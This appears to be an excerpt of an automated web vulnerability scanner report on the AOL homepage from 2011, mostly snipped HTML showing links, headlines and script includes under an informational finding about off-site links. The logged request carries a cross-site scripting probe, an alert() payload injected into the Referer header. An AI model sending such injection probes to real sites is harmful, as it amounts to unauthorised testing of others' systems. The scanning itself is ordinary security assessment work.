<p class="read"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_read" class="read lnid-sec4_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html#comments" name="om_featured-blog-rss_sec4_cmnt" class="comments lnid-sec4_lnk4">Comments</a>
...[SNIP]...
<a title="Child Preacher" name="om_vidfeat_image1" class="lnid-sec2_lnk1 icid-BTFimage3" href="http://video.aol.com/video/pint-sized-preacher/92871091"><img alt="Child Preacher" src="http://o.aolcdn.com/hss/storage/adam/92353343297a85c42004c42fcbe733d8/pint-sized-preacher.jpg"/></a>
...[SNIP]...
<a title="doughnuts!" name="om_vidfeat_image2" class="lnid-sec3_lnk1 icid-BTFimage1" href="http://video.aol.com/video/how-to-make-homemade-doughnuts/590730756"><img alt="doughnuts!" src="http://o.aolcdn.com/hss/storage/adam/5d60ce9fc3d0b921b344beb563fba9e8/CIA-Class_MG_1804-456.jpg"/></a>
...[SNIP]...
<a title="Flawless skin" name="om_vidfeat_image3" class="lnid-sec4_lnk1 icid-BTFimage2" href="http://video.aol.com/video/flawless-face-how-to-cover-up-acne/2545363948"><img alt="Flawless skin" src="http://o.aolcdn.com/hss/storage/adam/b9a2ef60d3c7ed958f77bf69067923d/flawless-face-how-to-cover-up-acne.jpg"/></a>
...[SNIP]...
<div class="mpid-9">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747" width="1" height="1" border="0" /> </div>
...[SNIP]...
<span class="mnid-brand-3 plid-74995"><a class="lnid-sec1_lnk1 icid-brandfooter_aboutme brand20" href="http://about.me/" name="om_brands_aboutme">about.me</a>
...[SNIP]...
<span class="mnid-brand-5 plid-75012"><a class="lnid-sec1_lnk1 icid-brandfooter_shoutcast brand62" href="http://www.shoutcast.com/" name="om_brands_shoutcast">Shoutcast</a>
...[SNIP]...
<span class="mnid-brand-7 plid-79414"><a class="lnid-sec1_lnk1 icid-brandfooter_spinner brand52" href="http://www.spinner.com/" name="om_brands_spinner">Spinner</a>
</span><span class="mnid-brand-8 plid-79337"><a class="lnid-sec1_lnk1 icid-brandfooter_joystiq brand21" href="http://www.joystiq.com/" name="om_brands_joystiq">Joystiq</a>
...[SNIP]...
</font><a href="http://bit.ly/btxTZj" class="fb lnid-sec1_lnk9" target="_blank" name="om_followme1">Facebook</a>
...[SNIP]...
</a> | <a href="http://bit.ly/cCSb2K" class="rss lnid-sec1_lnk11" target="_blank" name="om_followme3">RSS</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

6.2. http://www.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?r=404 HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: stips5=1
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:26:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-52.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CC0DF742115755B66658C29486BFC290; Path=/aol
Keep-Alive: timeout=5, max=37
Connection: Keep-Alive
Content-Length: 81368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
</iframe>
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v58.6/css/maing.css" />
<script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v8/butterfly.css" />
<style>
...[SNIP]...
<body class="butterfly">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327" class="lnid-sec1_lnk1" name="om_weathericon"><img class="wthr_avatar" alt="Dallas, TX: Mostly Clear" title="Dallas, TX: Mostly Clear" src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"/></a>
...[SNIP]...
<a id="aol-header-logo" title="Click here to refresh" name="om_hdrlogo" class="lnid-sec1_lnk1 " href="?icid=aolcomlogorefresh5&dlact=dl1"><img alt="Click here to refresh" src="http://portal.aolcdn.com/p5/forms/326/7116f573-7cda-4e8f-b2ec-b0d272075b69.png"/></a>
...[SNIP]...
<a href="http://mail.aol.com/" class="qnpos1 qn auth-0 show-500 hide-300 thresh-500 plid-47438 lnid-sec1_lnk1" name="om_quicknav_mail_flatstyle" title='AOL Mail' id='mailpreview'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/><span>
...[SNIP]...
</div><a href="http://www.aim.com/products/express/" class="qnpos2 plid-51753 lnid-sec1_lnk2" name="om_quicknav_aim_flatstyle" title='AIM' id='aimexpress'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
tp://video.aol.com/" target="_blank" class="qnpos7 plid-84662 lnid-sec1_lnk7" name="om_quicknav_quick-nav-video_flatstyle" title='Get millions of video from AOL , AOL partners and third party videos'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
<li><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<div class='hnav_header'><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Breaking News and Opinion on The Huffington Post" name="om_hnav_sec1_link3" class="icid-navbar_huffpo lnid-sec1_lnk3" href="http://www.huffingtonpost.com/">Huffington Post</a>
...[SNIP]...
<td class='underline_cell'><a title="Politics News and Opinion on The Huffington Post" name="om_hnav_sec1_link4" class="icid-navbar_politics lnid-sec1_lnk4" href="http://www.huffingtonpost.com/politics">Politics</a>
...[SNIP]...
<td class='underline_cell'><a title="Pro and college sports news, stats, scores and player updates from SportingNews" name="om_hnav_sec1_link5" class="icid-navbar_sports lnid-sec1_lnk5" href="http://aol.sportingnews.com">Sports</a>
...[SNIP]...
<td><a title="World News and Opinion on The Huffington Post" name="om_hnav_sec1_link7" class="icid-navbar_world lnid-sec1_lnk7" href="http://www.huffingtonpost.com/world">World</a>
...[SNIP]...
<li><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<div class='hnav_header'><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Celebrity news and photos and top music, movie and TV news" name="om_hnav_sec2_link3" class="icid-navbar_entnews lnid-sec2_lnk3" href="http://www.huffingtonpost.com/celebrity/">Celebrity News</a>
...[SNIP]...
<td class='underline_cell'><a title="Comedy News and Opinion on the Huffington Post" name="om_hnav_sec2_link4" class="icid-navbar_comedy lnid-sec2_lnk4" href="http://www.huffingtonpost.com/comedy">Comedy</a>
...[SNIP]...
<td class='underline_cell'><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec2_link5" class="icid-navbar_games lnid-sec2_lnk5" href="http://www.games.com">Games</a>
...[SNIP]...
<td class='underline_cell'><a title="Movie news, show times, tickets, trailers and more from Moviefone" name="om_hnav_sec2_link6" class="icid-navbar_movies lnid-sec2_lnk6" href="http://www.moviefone.com">Movies</a>
...[SNIP]...
<li><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Business News and Opinion on The Huffington Post" name="om_hnav_sec3_link3" class="icid-navbar_business lnid-sec3_lnk3" href="http://www.huffingtonpost.com/business">Business News</a>
...[SNIP]...
<td class='underline_cell'><a title="Business news, stock quotes and investment advice" name="om_hnav_sec3_link4" class="icid-navbar_Finance lnid-sec3_lnk4" href="http://www.dailyfinance.com">DailyFinance</a>
...[SNIP]...
<td class='underline_cell'><a title="Your quotes, news and summary from DailyFinance" name="om_hnav_sec3_link6" class="icid-navbar_myportfolios lnid-sec3_lnk6" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a>
...[SNIP]...
<td><a title="Small business news from the Huffington Post" name="om_hnav_sec3_link8" class="icid-navbar_smallbus lnid-sec3_lnk8" href="http://www.huffingtonpost.com/news/small-business-america/">Small Business</a>
...[SNIP]...
<li><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Coverage of everything new in gadgets and consumer electronics" name="om_hnav_sec4_link3" class="icid-navbar_engadget lnid-sec4_lnk3" href="http://www.engadget.com/">Engadget</a>
...[SNIP]...
<td class='underline_cell'><a title="The definitive source for news and information on the video game industry" name="om_hnav_sec4_link4" class="icid-navbar_joystiq lnid-sec4_lnk4" href="http://www.joystiq.com/">Joystiq</a>
...[SNIP]...
<td class='underline_cell'><a title="Your source for Apple news, tips, reviews and how-tos" name="om_hnav_sec4_link5" class="icid-navbar_tuaw lnid-sec4_lnk5" href="http://www.tuaw.com/">TUAW</a>
...[SNIP]...
<td><a title="A blog about technology news and analysis, as well as profiling of startup companies, products and websites" name="om_hnav_sec4_link6" class="icid-navbar_techcrunch lnid-sec4_lnk6" href="http://techcrunch.com/">TechCrunch</a>
...[SNIP]...
<li><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<div class='hnav_header'><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<td class='underline_cell'><a title="African American news, culture and community" name="om_hnav_sec5_link3" class="icid-navbar_bv lnid-sec5_lnk3" href="http://www.blackvoices.com/">Black Voices</a>
...[SNIP]...
<td class='underline_cell'><a title="Parenting advice, news, deals and more from ParentDish" name="om_hnav_sec5_link4" class="icid-navbar_parent lnid-sec5_lnk4" href="http://www.huffingtonpost.com/parents/">Family</a>
...[SNIP]...
<td class='underline_cell'><a title="Recipes, Cooking Tips, Food Advice and Menus" name="om_hnav_sec5_link5" class="icid-navbar_food lnid-sec5_lnk5" href="http://www.kitchendaily.com">Food</a>
...[SNIP]...
<td class='underline_cell'><a title="Health information, news, diet and fitness tips, tools and more" name="om_hnav_sec5_link6" class="icid-navbar_health lnid-sec5_lnk6" href="http://www.everydayhealth.com/aol">Health</a>
...[SNIP]...
<td class='underline_cell'><a title="Daily, weekly and monthly forecasts, astrology, tarot and numerology" name="om_hnav_sec5_link8" class="icid-navbar_horo lnid-sec5_lnk8" href="http://horoscopes.mydaily.com">Horoscopes</a>
...[SNIP]...
<td class='underline_cell'><a title="Latin American news, photos, AIM and free e-mail in Spanish" name="om_hnav_sec5_link9" class="icid-navbar_latino lnid-sec5_lnk9" href="http://www.aollatino.com/">Latino</a>
...[SNIP]...
<td class='underline_cell'><a title="Fashion trends, product reviews, beauty tips and more from StyleList" name="om_hnav_sec5_link10" class="icid-navbar_style lnid-sec5_lnk10" href="http://www.stylelist.com">StyleList</a>
...[SNIP]...
<td><a title="Healthy Living News and Opinion" name="om_hnav_sec5_link12" class="icid-navbar_wellness lnid-sec5_lnk12" href="http://www.huffingtonpost.com/healthy-living">Wellness</a>
...[SNIP]...
<td class='underline_cell'><a title="Offering free, online coupon codes and cash back savings for online discounts" name="om_hnav_sec6_link3" class="icid-navbar_coupons lnid-sec6_lnk3" href="http://shortcuts.com/">Coupons</a>
...[SNIP]...
<td class='underline_cell'><a title="Lets you quickly build simple and visually elegant splash pages that point visitors to your content from around the web." name="om_hnav_sec7_link4" class="icid-navbar_aboutme lnid-sec7_lnk4" href="https://about.me/">About.Me</a>
...[SNIP]...
<li><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec8_link1" class="icid-navbar_rootgames lnid-sec8_lnk1" href="http://www.games.com"><b>
...[SNIP]...
<li><a title="Get maps, driving directions, gas prices, local information and more" name="om_hnav_sec10_link1" class="icid-navbar_rootmapquest lnid-sec10_lnk1" href="http://www.mapquest.com/"><b>
...[SNIP]...
<li><a title="Your source for local knowledge" name="om_hnav_sec11_link1" class="icid-navbar_rootpatch lnid-sec11_lnk1" href="http://www.patch.com"><b>
...[SNIP]...
<li><a title="Free online radio offering 350+ sports, news, talk and music stations" name="om_hnav_sec12_link1" target="_blank" class="icid-navbar_rootradio lnid-sec12_lnk1" href="http://player.radio.com/player/AOLPlayer.php?version=1.2.11740&amp;station=+StationID+oString"><b>
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|87399" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/"><img height="217" alt="Secret to Saving on Diamond Ring" width="386" src="http://o.aolcdn.com/hss/storage/adam/dd176a4a16b8a6c303340f54cab9cdf6/ring-386az08172011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|87399">Secrets to Buying a Diamond Ring


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|87399">Minimum amount you should pay

</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|87399" href="http://www.dailyfinance.com/2011/08/09/savings-experiment-how-to-get-a-sun-kissed-look-for-less/">Affordable Way to Keep Your Tan
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|87399" href="http://www.dailyfinance.com/2011/08/02/savings-experiment-how-to-save-money-on-a-mattress/">Mattress-Buying Mistake to Avoid</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|87399" href="http://www.dailyfinance.com/2011/06/07/savings-experiment-pay-less-for-household-paper-products/">How to Save More on Toilet Paper
</a>
...[SNIP]...
<h2 id="om_news_more-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/">Latest Headlines</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html" class="lnid-sec2_lnk1">Stocks Plunge As More Signs Of Economic Weakness Emerge</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/officials-change-deportation-policy_n_930688.html" class="lnid-sec2_lnk2">Officials Change Deportation Policy</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/bahrain-protesters-clash-_n_930877.html" class="lnid-sec2_lnk3">Bahrain Protesters Clash With Security Forces</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/aig-bailout_n_930867.html" class="lnid-sec2_lnk4">AIG Repays $2.15 Billion Of Its Bailout Money</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/2-men-plead-guilty-in-swa_n_930827.html" class="lnid-sec2_lnk5">Two Plead Guilty For Branding Swastika On Navajo Man</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/mohammad-younis-man-linke_n_930844.html" class="lnid-sec2_lnk6">Man Linked To Times Square Bomber Pleads Guilty</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/afghanistan-roadside-bomb_n_930780.html" class="lnid-sec2_lnk7">Roadside Bomb Kills 12 Children In Afghanistan</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/elizabeth-warren-exploratory-committee_n_930530.html" class="lnid-sec2_lnk8">Elizabeth Warren Takes Next Step Toward Possible Senate Run</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class="lnid-sec2_lnk9">Norway Killer Called Authorities Twice During Shooting, Police Say</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html" class="lnid-sec2_lnk10">Los Angeles Downgraded By Standard & Poor's</a>
...[SNIP]...
</ul><a name="om_news_more-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com">More News</a>
...[SNIP]...
<h2><a name="om_marketquotes_title" href="http://www.dailyfinance.com/market-news/" class=" lnid-sec1_lnk1">Market Quotes</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote1" href="http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji">

DJIA
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote2" href="http://www.dailyfinance.com/quotes/nasdaq-composite/%24compx/nai">

NASDAQ
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote3" href="http://www.dailyfinance.com/quotes/sandp-500-index-rth/%24inx/cmi">

S&P 500
</a>
...[SNIP]...
<div class="markets-footer">
<a name="om_marketquotes_link1" class="lnid-sec2_lnk1 first" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a><a name="om_marketquotes_link2" class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/market-news/">Markets</a><a name="om_marketquotes_link3" class="lnid-sec2_lnk3 last" href="http://www.dailyfinance.com/">Finance News</a>
...[SNIP]...
<h2 id="om_news_business-news_title"><a class="lnid-sec1_lnk1" href="http://www.dailyfinance.com/">Business News</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk1" href="http://www.dailyfinance.com/market-news/">More Signs of Economic Weakness Spark Major Selloff</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/2011/08/18/are-you-photoshopping-your-finances/">Are Your Photoshopping Your Finances?</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk3" href="http://www.dailyfinance.com/2011/08/17/u-s-credit-card-debt-declines/">How to Dig Yourself Out of Credit Card Debt</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk4" href="http://www.dailyfinance.com/2011/08/18/back-to-school-fashion-uniforms-gain-popularity-and-coolness/">School Uniforms: More Popular, More Fashionable</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk5" href="http://money.cnn.com/2011/08/18/news/international/markets_morgan_stanley/index.htm?iid=HP_LN">Morgan Stanley: We're 'Dangerously Close' to Recession</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk6" href="http://247wallst.com/2011/08/17/the-richest-diamond-mines-in-the-world/">The Richest Diamond Mines in the World</a>
...[SNIP]...
</ul><a name="om_news_business-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.dailyfinance.com/">More Business News</a>
...[SNIP]...
<h2 id="om_news_sports-news_title"><a class="lnid-sec1_lnk1" href="http://www.fanhouse.com/">Sports News</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class="lnid-sec2_lnk1">Basketball Game in China Ends With Bench-Clearing Brawl</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-08-18/michael-vick-to-gq-i-miss-my-dogs" class="lnid-sec2_lnk2">Michael Vick Says He Misses Owning Dogs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/hideki-irabus-death-officially-ruled-a-suicide" class="lnid-sec2_lnk3">Ex-Yankee Irabu's Death Officially Ruled a Suicide</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class="lnid-sec2_lnk4">Former Price is Right Model Making NASCAR Debut</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers" class="lnid-sec2_lnk5">Tiger, LeBron accused of being cheap tippers</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/mike-jacobs-tests-positive-for-hgh-is-released-by-rockies" class="lnid-sec2_lnk6">Minor League Player Suspended 50 Games for HGH Use</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-football/story/2011-08-18/barry-alvarez-chad-1-million-loss-in-shapiro-ponzi-scheme" class="lnid-sec2_lnk7">Wisconsin AD and Family Lose $1 Million in Ponzi Scheme</a>
...[SNIP]...
</ul><a name="om_news_sports-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.fanhouse.com">More Stories</a>
...[SNIP]...
<h2 id="om_news_entertainment-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/entertainment/">Entertainment News</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/josh-groban-joins-the-office_n_930818.html" class="lnid-sec2_lnk1">'The Office' Gets An Unexpected New Star</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html" class="lnid-sec2_lnk2">Betty White: America's Most Trusted Celebrity</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/stage-collapse-at-pukkelpop-belgium-kills_n_930705.html" class="lnid-sec2_lnk3">Another Stage Collapse Kills At Least One</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/texas-killing-fields-trailer_n_930675.html" class="lnid-sec2_lnk4">Sam Worthington, Jessica Chastain Enter Killing Fields</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/justin-bieber-tops-list-of-richest-teen-entertainers_n_930578.html" class="lnid-sec2_lnk5">Who Are Hollywood's Richest Teens?</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/blade-runner-ridley-scott-new-film_n_930593.html" class="lnid-sec2_lnk6">Legendary Film Getting Unexpected Revamp</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/burt-reynolds-facing-foreclosure_n_930443.html" class="lnid-sec2_lnk7">Burt Reynolds Facing Foreclosure</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/kim-kardashians-wedding-workout_n_930316.html" class="lnid-sec2_lnk8">WATCH: Kim Kardashian's Wedding Workout</a>
...[SNIP]...
</ul><a name="om_news_entertainment-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com/entertainment/">More Entertainment News</a>
...[SNIP]...
andalonevj-.5- adrefresh-true hiderelvids- lnid-sec2_lnk1 vplident-1116699228001 vplname-urlesque-mans-about-to-do-the-impossible" href="video/urlesque-mans-about-to-do-the-impossible/1116699228001/"><img height="155" width="233" class="vjimg" src="http://i.huffpost.com/gen/332441/thumbs/a-MAN-DEFIES-PHYSICS-233x155.jpg"/><div class="vbpos-bottom-right videobutton" style="width:41px; height:41px; ">
<img src="http://portal.aolcdn.com/p5/forms/1439/4d409bd3-5f87-4f0a-adb2-b0fa9450f8c6.png" alt="" class="playbutton" title=""/><img src="http://portal.aolcdn.com/p5/forms/1439/b81d51ea-1a48-4e8d-9495-9ecbf12c337c.png" alt="" class="playbutton-over" title=""/><div class="vbtext" title="">
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz1 plid-87598">
<a title="Price Is Right" name="om_daily-buzz_image_1" class="photo-link lnid-sec2_lnk1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar"><img alt="Price Is Right" src="http://i.huffpost.com/gen/332819/thumbs/a-MODEL-NASCAR-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class=" lnid-sec2_lnk3">Former 'Price Is Right' Model Makes Unexpected Debut</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz2 plid-87597">
<a title="Chipotle" name="om_daily-buzz_image_2" class="photo-link lnid-sec3_lnk1" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html"><img alt="Chipotle" src="http://i.huffpost.com/gen/332774/thumbs/a-CHIPOTLE-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline2" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html" class=" lnid-sec3_lnk3">Chipotle Makes Nauseating Confession</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz3 plid-87639">
<a title="Russell Armstrong" name="om_daily-buzz_image_3" class="photo-link lnid-sec4_lnk1" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html"><img alt="Russell Armstrong" src="http://portal.aolcdn.com/p5/forms/656/00174597-3ffe-4883-9330-a301427eb1b9.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline3" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html" class=" lnid-sec4_lnk3">Russell's 'Housewives' Salary Not What You Might Think</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz4 plid-87646">
<a title="Belgium stage collapse" name="om_daily-buzz_image_4" class="photo-link lnid-sec5_lnk1" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/"><img alt="Belgium stage collapse" src="http://portal.aolcdn.com/p5/forms/2560/b289c2ee-3110-4211-98a8-3ec20b6bf58f.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline4" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/" class=" lnid-sec5_lnk3">Amateur Video Captures Deadly Stage Collapse</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz5 plid-87595">
<a title="Pug" name="om_daily-buzz_image_5" class="photo-link lnid-sec6_lnk1" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html"><img alt="Pug" src="http://i.huffpost.com/gen/332759/thumbs/a-PUG-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline5" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html" class=" lnid-sec6_lnk3">Watch: 'Skydiving Pug' Makes 64th Jump</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz6 plid-87599">
<a title="Obama" name="om_daily-buzz_image_6" class="photo-link lnid-sec7_lnk1" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html"><img alt="Obama" src="http://i.huffpost.com/gen/332814/thumbs/a-OBAMA-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline6" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html" class=" lnid-sec7_lnk3">Photos: Embarrassing Pics Of Presidents on Vacation</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz7 plid-87559">
